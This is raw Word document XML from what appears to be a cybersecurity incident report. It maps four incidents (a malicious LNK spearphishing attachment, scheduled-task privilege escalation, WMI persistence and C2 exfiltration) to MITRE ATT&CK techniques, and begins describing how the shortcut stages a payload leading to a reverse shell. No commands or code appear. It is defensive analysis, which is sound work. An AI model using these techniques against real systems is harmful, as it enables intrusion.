          <w:p w14:paraId="4A7EC3AF" w14:textId="77777777" w:rsidR="00FF3308" w:rsidRPr="004C02FF" w:rsidRDefault="00FF3308" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technique Name &amp; ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB4373" w14:paraId="4E1F5E1C" w14:textId="77777777" w:rsidTr="00CB4373">
        <w:trPr>
          <w:trHeight w:val="198"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56622D62" w14:textId="6416D285" w:rsidR="00CB4373" w:rsidRPr="00CB4373" w:rsidRDefault="38774E48" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Incident #001 – Spearphishing Attachment (LNK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F73FCD2" w14:textId="1BEDDFDA" w:rsidR="00CB4373" w:rsidRPr="00CB4373" w:rsidRDefault="2A23AEA7" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79B0FF43" w14:textId="0DBCE81D" w:rsidR="00CB4373" w:rsidRPr="00CB4373" w:rsidRDefault="646325F4" w:rsidP="252AFF6E">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spear phishing Attachment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB6AD33" w14:textId="718CEA3E" w:rsidR="00CB4373" w:rsidRPr="00CB4373" w:rsidRDefault="0AD16C7C" w:rsidP="252AFF6E">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – T1566.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF3308" w14:paraId="46A97BDA" w14:textId="77777777" w:rsidTr="00B64716">
        <w:trPr>
          <w:trHeight w:val="291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="246A3742" w14:textId="0809A68F" w:rsidR="00FF3308" w:rsidRPr="00CB4373" w:rsidRDefault="00CB4373" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:commentRangeStart w:id="5"/>
            <w:commentRangeEnd w:id="5"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:commentReference w:id="5"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Incident #002 – Privileged Escalation via Insecure Scheduled Task Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19D6A5B6" w14:textId="0FE6DC3A" w:rsidR="00FF3308" w:rsidRPr="00CB4373" w:rsidRDefault="19B207BF" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A9FFC93" w14:textId="4B50BCD3" w:rsidR="00EC5A44" w:rsidRPr="00CB4373" w:rsidRDefault="3A6FC043" w:rsidP="00EC5A44">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Task/Job: Scheduled Task - T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C68A4F" w14:paraId="40750D72" w14:textId="77777777" w:rsidTr="00C68A4F">
        <w:trPr>
          <w:trHeight w:val="291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E1B4748" w14:textId="780FCCAC" w:rsidR="00C68A4F" w:rsidRDefault="16C7C104" w:rsidP="00C68A4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident #003 - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permanent WMI Event Subscription Persistence (Timer-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01C289B9" w14:textId="2C12063E" w:rsidR="00C68A4F" w:rsidRDefault="7955228A" w:rsidP="00C68A4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3687F706" w14:textId="745BF794" w:rsidR="00C68A4F" w:rsidRDefault="6E5B472A" w:rsidP="00C68A4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Event Triggered Execution: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Management Instrumentation - T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C68A4F" w14:paraId="12D31EA4" w14:textId="77777777" w:rsidTr="00C68A4F">
        <w:trPr>
          <w:trHeight w:val="291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40289004" w14:textId="334B1175" w:rsidR="00C68A4F" w:rsidRDefault="3BDDE454" w:rsidP="00C68A4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Incident #004 – Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BB79DDE" w14:textId="2385169A" w:rsidR="00C68A4F" w:rsidRDefault="4F6B5FE4" w:rsidP="00C68A4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24C169EA" w14:textId="5F37DB6D" w:rsidR="00C68A4F" w:rsidRDefault="4F6B5FE4" w:rsidP="00C68A4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel – T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F013BF9" w14:textId="77777777" w:rsidR="004C02FF" w:rsidRDefault="004C02FF" w:rsidP="00E71233"/>
    <w:p w14:paraId="3EFC33BB" w14:textId="7D0467DC" w:rsidR="00506EEA" w:rsidRDefault="00381555" w:rsidP="00705FA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Should a pictorial representation of the Tactics, Techniques and Procedures (TTPs) is required, please refer to the following JSON file which can be loaded onto the </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>ATT&amp;CK® Navigator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E76B54" w14:textId="0F245AA0" w:rsidR="00600810" w:rsidRDefault="00F62D9D" w:rsidP="00705FA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="1504" w:dyaOrig="981" w14:anchorId="398DC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75pt" o:ole="">
            <v:imagedata r:id="rId15" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1840527008" r:id="rId16"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="339AB2F6" w14:textId="649EC238" w:rsidR="00E749F5" w:rsidRDefault="00E749F5" w:rsidP="63D07F38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDE7D46" w14:textId="62C4D444" w:rsidR="00E749F5" w:rsidRDefault="00E749F5" w:rsidP="00705FA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58789628" w14:textId="77777777" w:rsidR="006936E1" w:rsidRPr="004D5913" w:rsidRDefault="006211AB" w:rsidP="00B66DA4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc220896678"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detailed List of Cybersecurity Incidents &amp; TTPs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="49002A44" w14:textId="6BD0E84C" w:rsidR="00C3354B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc220896679"/>
      <w:bookmarkStart w:id="8" w:name="_Toc36764273"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Incident #001 – Spearphishing Attachment (LNK)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2525716C" w14:textId="2F1437EB" w:rsidR="00C3354B" w:rsidRDefault="00C3354B" w:rsidP="6845FCFF"/>
    <w:p w14:paraId="287CFD80" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="003419C9" w:rsidRDefault="00C3354B" w:rsidP="00C3354B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc220896680"/>
      <w:commentRangeStart w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="10"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C3354B" w14:paraId="31EA40B0" w14:textId="77777777" w:rsidTr="6845F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Align w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E15D2FE" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="064C3CA8" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35BFBF77" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1821082F" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B"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Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46439F48" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B426D71" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B"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Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E6D4B30" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="00C3354B"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color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3354B" w14:paraId="2E41E653" w14:textId="77777777" w:rsidTr="6845F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Align w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02C06806" w14:textId="70249FA9" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A63579E" w14:textId="54642C30" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="6845FCFF" w:rsidP="00FC0D9E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1566.00</w:t>
            </w:r>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40250D09" w14:textId="7389DD40" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6871EB6F" w14:textId="0DBCE81D" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spear phishing Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7561E101" w14:textId="44A2D30B" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4701E1D8" w14:textId="267681A6" w:rsidR="00C3354B" w:rsidRPr="009F3FA8" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User (requires the user to click/open the attachment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="157B9FAB" w14:textId="2BDD7950" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46603575" w14:textId="571348B4" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Technique justification (alignment to MITRE definition):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781002A1" w14:textId="4282C46A" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This incident demonstrates T1566.001 Spearphishing Attachment because the initial access vector is an email-delivered attachment (malicious .LNK shortcut) that relies on user interaction to execute. The shortcut then stages a payload download and execution that results in attacker access (reverse shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9AB03A" w14:textId="15F453E2" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
